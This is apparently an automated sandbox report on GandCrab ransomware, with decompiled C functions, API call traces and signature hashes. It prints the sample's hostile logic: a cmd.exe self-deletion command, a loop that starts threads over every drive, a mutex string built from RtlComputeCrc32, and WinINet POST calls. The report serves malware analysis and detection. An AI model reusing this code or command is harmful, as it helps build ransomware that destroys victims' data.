                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
                                      • Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D
                                      • Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
                                      • Part of subcall function 0F585220: Sleep.KERNEL32(000003E8), ref: 0F5852C5
                                      • Part of subcall function 0F585220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
                                      • Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
                                      • Part of subcall function 0F585220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
                                      • Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
                                      • Part of subcall function 0F585220: wsprintfW.USER32 ref: 0F585328
                                      • Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
                                    • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
                                    • lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5855B3
                                    • lstrlenW.KERNEL32(?), ref: 0F5855BF
                                    • lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
                                    • InternetCloseHandle.WININET(0F58581B), ref: 0F585657
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
                                    • String ID: POST$popkadurak
                                    • API String ID: 2554059081-2707760125
                                    • Opcode ID: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
                                    • Instruction ID: 7427cf842f480294e08547429d7791379471136cf6f5da861cba3b359e4b6d84
                                    • Opcode Fuzzy Hash: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
                                    • Instruction Fuzzy Hash: 7D41C671E0030AE6EB10AFA9DD41FED7F79FF88721F141125EA40B2241EB78564ACB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E0F5872A0(intOrPtr* __ecx) {
                                    				int _t42;
                                    				int _t48;
                                    				int _t51;
                                    				int _t54;
                                    				int _t57;
                                    				int _t60;
                                    				int _t63;
                                    				int _t66;
                                    				int _t70;
                                    				int _t72;
                                    				void* _t75;
                                    				intOrPtr* _t86;
                                    				int _t88;
                                    				int _t89;
                                    				int _t90;
                                    				int _t91;
                                    				int _t92;
                                    				int _t93;
                                    				int _t94;
                                    				void* _t95;
                                    
                                    				_t40 = lstrlenW;
                                    				_t86 = __ecx;
                                    				_t75 = 0;
                                    				if( *__ecx != 0) {
                                    					_t72 = lstrlenW( *(__ecx + 8));
                                    					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                    					_t40 = lstrlenW;
                                    					_t75 = _t3 + _t72;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                    					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                    					_t70 = lstrlenW( *(_t86 + 0x10));
                                    					_t7 = _t95 + 4; // 0x4
                                    					_t75 = _t7 + _t70 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                    					_t94 = lstrlenW( *(_t86 + 0x20));
                                    					_t66 = lstrlenW( *(_t86 + 0x1c));
                                    					_t11 = _t94 + 4; // 0x4
                                    					_t75 = _t11 + _t66 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                    					_t93 = lstrlenW( *(_t86 + 0x2c));
                                    					_t63 = lstrlenW( *(_t86 + 0x28));
                                    					_t15 = _t93 + 4; // 0x4
                                    					_t75 = _t15 + _t63 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                    					_t92 = lstrlenW( *(_t86 + 0x38));
                                    					_t60 = lstrlenW( *(_t86 + 0x34));
                                    					_t19 = _t92 + 4; // 0x4
                                    					_t75 = _t19 + _t60 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                    					_t91 = lstrlenW( *(_t86 + 0x44));
                                    					_t57 = lstrlenW( *(_t86 + 0x40));
                                    					_t23 = _t91 + 4; // 0x4
                                    					_t75 = _t23 + _t57 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                    					_t90 = lstrlenW( *(_t86 + 0x50));
                                    					_t54 = lstrlenW( *(_t86 + 0x4c));
                                    					_t27 = _t90 + 4; // 0x4
                                    					_t75 = _t27 + _t54 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                    					_t89 = lstrlenW( *(_t86 + 0x5c));
                                    					_t51 = lstrlenW( *(_t86 + 0x58));
                                    					_t31 = _t89 + 4; // 0x4
                                    					_t75 = _t31 + _t51 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                    					_t75 = _t75 + 0x14;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                    					_t88 = lstrlenW( *(_t86 + 0x7c));
                                    					_t48 = lstrlenW( *(_t86 + 0x78));
                                    					_t36 = _t88 + 4; // 0x4
                                    					_t75 = _t36 + _t48 + _t75;
                                    				}
                                    				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                    					return _t75;
                                    				} else {
                                    					_t42 = lstrlenW( *(_t86 + 0x88));
                                    					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                    				}
                                    			}























                                    0x0f5872a0
                                    0x0f5872a8
                                    0x0f5872aa
                                    0x0f5872ae
                                    0x0f5872b3
                                    0x0f5872c1
                                    0x0f5872c4
                                    0x0f5872c9
                                    0x0f5872c9
                                    0x0f5872cf
                                    0x0f5872d9
                                    0x0f5872e0
                                    0x0f5872e4
                                    0x0f5872e7
                                    0x0f5872e7
                                    0x0f5872ed
                                    0x0f5872fb
                                    0x0f5872fd
                                    0x0f587305
                                    0x0f587308
                                    0x0f587308
                                    0x0f58730e
                                    0x0f58731c
                                    0x0f58731e
                                    0x0f587326
                                    0x0f587329
                                    0x0f587329
                                    0x0f58732f
                                    0x0f58733d
                                    0x0f58733f
                                    0x0f587347
                                    0x0f58734a
                                    0x0f58734a
                                    0x0f587350
                                    0x0f58735e
                                    0x0f587360
                                    0x0f587368
                                    0x0f58736b
                                    0x0f58736b
                                    0x0f587371
                                    0x0f58737f
                                    0x0f587381
                                    0x0f587389
                                    0x0f58738c
                                    0x0f58738c
                                    0x0f587392
                                    0x0f5873a0
                                    0x0f5873a2
                                    0x0f5873aa
                                    0x0f5873ad
                                    0x0f5873ad
                                    0x0f5873b3
                                    0x0f5873b5
                                    0x0f5873b5
                                    0x0f5873bc
                                    0x0f5873ca
                                    0x0f5873cc
                                    0x0f5873d4
                                    0x0f5873d7
                                    0x0f5873d7
                                    0x0f5873e0
                                    0x0f58740c
                                    0x0f5873e2
                                    0x0f5873e8
                                    0x0f587406
                                    0x0f587406

                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                    • lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873E8
                                    • lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873F6
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID:
                                    • API String ID: 1659193697-0
                                    • Opcode ID: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
                                    • Instruction ID: 5e1af2344e6d4b3c2a48226344ad4df0a39555e05da5ee398a47357ec6d8bdd6
                                    • Opcode Fuzzy Hash: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
                                    • Instruction Fuzzy Hash: 5F412232100612FFD7115FA8EE8C794BBA1FF08316F185535E416B2621D779B47AEB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E0F585F00(void* __ecx, intOrPtr __edx, void* __esi) {
                                    				CHAR* _v8;
                                    				intOrPtr _v12;
                                    				char _v267;
                                    				char _v268;
                                    				CHAR* _t10;
                                    				struct HINSTANCE__* _t13;
                                    				_Unknown_base(*)()* _t20;
                                    				void* _t24;
                                    				void* _t31;
                                    				void* _t35;
                                    
                                    				_t10 =  *0xf592a78; // 0x0
                                    				_v12 = __edx;
                                    				_t24 = __ecx;
                                    				_v8 = _t10;
                                    				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
                                    				if(_t31 != 0) {
                                    					_t13 = GetModuleHandleA("ntdll.dll");
                                    					if(_t13 != 0) {
                                    						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
                                    						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
                                    						_t35 = _t35 + 0xc;
                                    					}
                                    					_v268 = 0;
                                    					E0F589170( &_v267, 0, 0xff);
                                    					E0F585DC0( &_v268, _t31, lstrlenA(_t31));
                                    					E0F585E70( &_v268, _t24, _v12);
                                    					VirtualFree(_t31, 0, 0x8000);
                                    				}
                                    				return _t24;
                                    			}













                                    0x0f585f09
                                    0x0f585f1b
                                    0x0f585f1e
                                    0x0f585f20
                                    0x0f585f29
                                    0x0f585f2d
                                    0x0f585f38
                                    0x0f585f40
                                    0x0f585f49
                                    0x0f585f6c
                                    0x0f585f72
                                    0x0f585f75
                                    0x0f585f81
                                    0x0f585f8b
                                    0x0f585fa3
                                    0x0f585fb3
                                    0x0f585fc3
                                    0x0f585fc3
                                    0x0f585fd0

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F585F23
                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F585F38
                                    • GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0F585F49
                                    • lstrlenA.KERNEL32(00000000), ref: 0F585F54
                                    • wsprintfA.USER32 ref: 0F585F6C
                                    • _memset.LIBCMT ref: 0F585F8B
                                    • lstrlenA.KERNEL32(00000000), ref: 0F585F94
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585FC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
                                    • String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
                                    • API String ID: 218840185-1387466253
                                    • Opcode ID: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
                                    • Instruction ID: 385a465960556f8941655574efeaa2c36689c4abeb750ef906f7080a655123ff
                                    • Opcode Fuzzy Hash: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
                                    • Instruction Fuzzy Hash: 3B113435E44304BBD7206B68ED49FAE7F78BB44B21F040075F905F2281EBB85A57AA51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F585350() {
                                    				WCHAR* _t6;
                                    				short* _t8;
                                    
                                    				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                    				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                    				if(_t6 != 0) {
                                    					GetModuleFileNameW(0, _t6, 0x200);
                                    					if(_t8 != 0) {
                                    						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                    						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                    					}
                                    				}
                                    				ExitProcess(0);
                                    			}





                                    0x0f585376
                                    0x0f58537a
                                    0x0f58537e
                                    0x0f585388
                                    0x0f585390
                                    0x0f585399
                                    0x0f5853b3
                                    0x0f5853b3
                                    0x0f585390
                                    0x0f5853bb

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F5854E9,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000), ref: 0F585366
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585378
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585388
                                    • wsprintfW.USER32 ref: 0F585399
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F5853B3
                                    • ExitProcess.KERNEL32 ref: 0F5853BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                    • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                    • API String ID: 4033023619-516011104
                                    • Opcode ID: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
                                    • Instruction ID: e09e45b48663f837c3e9811199cf4d778e08a4ffb85ac4991b933953e111c7fa
                                    • Opcode Fuzzy Hash: 20039c9c6269d5e4cb6edae670f9956e195e92e99c2c911f2e7e7e31a6341676
                                    • Instruction Fuzzy Hash: D6F01C317C231033F12126645D0BF0B2E59AB89F32F280016B704BE2C29AE8641786A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F582C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                    				struct tagPAINTSTRUCT _v68;
                                    				struct tagPAINTSTRUCT _v88;
                                    				short _v100;
                                    				intOrPtr _t13;
                                    				void* _t15;
                                    				struct HDC__* _t21;
                                    				int _t30;
                                    
                                    				_t13 =  *0xf58f290; // 0x21
                                    				asm("movdqu xmm0, [0xf58f280]");
                                    				_t30 = _a8;
                                    				_v88.fErase = _t13;
                                    				asm("movdqu [esp+0x10], xmm0");
                                    				_t15 = _t30 - 2;
                                    				if(_t15 == 0) {
                                    					CreateThread(0, 0, E0F582AD0, 0, 0, 0);
                                    					DestroyWindow(_a4);
                                    					return 0xdeadbeef;
                                    				} else {
                                    					if(_t15 == 0xd) {
                                    						_t21 = BeginPaint(_a4,  &_v68);
                                    						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                    						EndPaint(_a4,  &_v88);
                                    						return 0;
                                    					} else {
                                    						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                    					}
                                    				}
                                    			}










                                    0x0f582c59
                                    0x0f582c5e
                                    0x0f582c66
                                    0x0f582c69
                                    0x0f582c70
                                    0x0f582c76
                                    0x0f582c79
                                    0x0f582ce9
                                    0x0f582cf2
                                    0x0f582d01
                                    0x0f582c7b
                                    0x0f582c7e
                                    0x0f582c9f
                                    0x0f582cbd
                                    0x0f582ccb
                                    0x0f582cd7
                                    0x0f582c80
                                    0x0f582c94
                                    0x0f582c94
                                    0x0f582c7e

                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0F582C8A
                                    • BeginPaint.USER32(?,?), ref: 0F582C9F
                                    • lstrlenW.KERNEL32(?), ref: 0F582CAC
                                    • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F582CBD
                                    • EndPaint.USER32(?,?), ref: 0F582CCB
                                    • CreateThread.KERNEL32 ref: 0F582CE9
                                    • DestroyWindow.USER32(?), ref: 0F582CF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                    • String ID: GandCrab!
                                    • API String ID: 572880375-2223329875
                                    • Opcode ID: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
                                    • Instruction ID: 7dd70b9b9c76b731d7425979708289aed013986bcc28d5dceecaf99a43ece8a4
                                    • Opcode Fuzzy Hash: 03fe6f4e7fc262c3fec18bf491b0a8652eef278254db1f0691bdd868c3a81248
                                    • Instruction Fuzzy Hash: 11119332104209BFD711DF54DD0AFBA7FA8FB48722F001616FD41E5290E7759526EB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0F583FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
                                    				char _v612;
                                    				char _v644;
                                    				void* _v908;
                                    				void* _v912;
                                    				intOrPtr _v916;
                                    				intOrPtr _v920;
                                    				short _v924;
                                    				signed int _v928;
                                    				void* _v932;
                                    				void* _v936;
                                    				intOrPtr _v940;
                                    				intOrPtr _v944;
                                    				intOrPtr _v948;
                                    				long _v952;
                                    				struct _SECURITY_ATTRIBUTES* _v956;
                                    				struct _SECURITY_ATTRIBUTES* _v960;
                                    				struct _SECURITY_ATTRIBUTES* _v964;
                                    				char _v968;
                                    				void* _t67;
                                    				short _t68;
                                    				intOrPtr _t69;
                                    				int _t72;
                                    				long _t75;
                                    				signed int _t77;
                                    				signed int _t80;
                                    				intOrPtr* _t82;
                                    				void* _t84;
                                    				struct _SECURITY_ATTRIBUTES* _t87;
                                    				long _t88;
                                    				intOrPtr _t89;
                                    				intOrPtr _t92;
                                    				intOrPtr _t95;
                                    				char _t101;
                                    				intOrPtr _t106;
                                    				void _t110;
                                    				struct _SECURITY_ATTRIBUTES** _t114;
                                    				intOrPtr _t115;
                                    				signed int _t119;
                                    				void* _t121;
                                    
                                    				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                    				_t87 = __ecx;
                                    				_v964 = __ecx;
                                    				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                    				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                    				_t88 = 0;
                                    				 *_t67 = 0x43;
                                    				_t68 =  *L"?:\\"; // 0x3a003f
                                    				_v924 = _t68;
                                    				_t69 =  *0xf58f350; // 0x5c
                                    				_v920 = _t69;
                                    				_v968 = GetTickCount();
                                    				_t114 =  &_v644;
                                    				_t110 = 0x41;
                                    				do {
                                    					_v924 = _t110;
                                    					_t72 = GetDriveTypeW( &_v924);
                                    					if(_t72 >= 2 && _t72 != 5) {
                                    						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                    						_t84 = _t114 - 8;
                                    						 *_t84 = _t110;
                                    						 *_t114 = 0;
                                    						_t114[2] = 0;
                                    						_t114[3] = 0;
                                    						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F586F40, _t84, 0, 0);
                                    						_t88 = _t88 + 1;
                                    						_t114 =  &(_t114[6]);
                                    					}
                                    					_t110 = _t110 + 1;
                                    				} while (_t110 <= 0x5a);
                                    				_v952 = _t88;
                                    				asm("xorps xmm0, xmm0");
                                    				_v956 = 0;
                                    				_v960 = 0;
                                    				asm("movlpd [esp+0x38], xmm0");
                                    				asm("movlpd [esp+0x30], xmm0");
                                    				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                    				_t75 = GetTickCount();
                                    				asm("xorps xmm0, xmm0");
                                    				_t115 = _v948;
                                    				_v932 = _t75 - _v968;
                                    				_t77 = 0;
                                    				_v964 = 0;
                                    				asm("movlpd [esp+0x40], xmm0");
                                    				if(_t88 < 2) {
                                    					_t95 = _v940;
                                    					_t106 = _v944;
                                    				} else {
                                    					_t26 = _t88 - 2; // -1
                                    					_t92 = _v940;
                                    					_t82 =  &_v612;
                                    					_t101 = (_t26 >> 1) + 1;
                                    					_v968 = _t101;
                                    					_v928 = _t101 + _t101;
                                    					_t106 = _v944;
                                    					do {
                                    						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                    						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                    						asm("adc edi, [eax-0x14]");
                                    						_t115 = _t115 +  *_t82;
                                    						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                    						asm("adc edx, [eax+0x4]");
                                    						_t82 = _t82 + 0x30;
                                    						_t41 =  &_v968;
                                    						 *_t41 = _v968 - 1;
                                    					} while ( *_t41 != 0);
                                    					_t77 = _v928;
                                    					_v968 = _t92;
                                    					_t88 = _v952;
                                    					_t95 = _v968;
                                    				}
                                    				if(_t77 >= _t88) {
                                    					_t89 = _v916;
                                    				} else {
                                    					_t80 = _t77 + _t77 * 2;
                                    					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                    					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                    				}
                                    				asm("adc edx, edi");
                                    				asm("adc edx, eax");
                                    				return E0F585670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                    			}










































                                    0x0f583ff6
                                    0x0f584008
                                    0x0f58400c
                                    0x0f584010
                                    0x0f58401b
                                    0x0f58401e
                                    0x0f584020
                                    0x0f584023
                                    0x0f584028
                                    0x0f58402c
                                    0x0f584031
                                    0x0f58403b
                                    0x0f58403f
                                    0x0f584046
                                    0x0f584050
                                    0x0f584054
                                    0x0f58405a
                                    0x0f584063
                                    0x0f584072
                                    0x0f584075
                                    0x0f584082
                                    0x0f584085
                                    0x0f58408b
                                    0x0f584092
                                    0x0f58409f
                                    0x0f5840a3
                                    0x0f5840a4
                                    0x0f5840a4
                                    0x0f5840a7
                                    0x0f5840a8
                                    0x0f5840b6
                                    0x0f5840ba
                                    0x0f5840bd
                                    0x0f5840c7
                                    0x0f5840cf
                                    0x0f5840d5
                                    0x0f5840db
                                    0x0f5840e1
                                    0x0f5840eb
                                    0x0f5840f2
                                    0x0f5840f6
                                    0x0f5840fa
                                    0x0f5840fc
                                    0x0f584104
                                    0x0f58410d
                                    0x0f58416c
                                    0x0f584170
                                    0x0f58410f
                                    0x0f58410f
                                    0x0f584112
                                    0x0f584118
                                    0x0f58411f
                                    0x0f584120
                                    0x0f584127
                                    0x0f58412b
                                    0x0f584130
                                    0x0f584137
                                    0x0f58413a
                                    0x0f58413e
                                    0x0f584148
                                    0x0f58414a
                                    0x0f58414e
                                    0x0f584151
                                    0x0f584154
                                    0x0f584154
                                    0x0f584154
                                    0x0f58415a
                                    0x0f58415e
                                    0x0f584162
                                    0x0f584166
                                    0x0f584166
                                    0x0f584176
                                    0x0f58419a
                                    0x0f584178
                                    0x0f584178
                                    0x0f584182
                                    0x0f584186
                                    0x0f58418d
                                    0x0f5841a4
                                    0x0f5841a8
                                    0x0f5841c6

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F584010
                                    • GetTickCount.KERNEL32 ref: 0F584035
                                    • GetDriveTypeW.KERNEL32(?), ref: 0F58405A
                                    • CreateThread.KERNEL32 ref: 0F584099
                                    • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F5840DB
                                    • GetTickCount.KERNEL32 ref: 0F5840E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                    • String ID: ?:\
                                    • API String ID: 458387131-2533537817
                                    • Opcode ID: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
                                    • Instruction ID: fd7a28090f564a608222304982e78d080365528b895bd94cc6acfd6b22cf9f7f
                                    • Opcode Fuzzy Hash: d4cec303b186f5f2fdde77e4a29a2dac19d8eea38d6ff3a154c802728047e42d
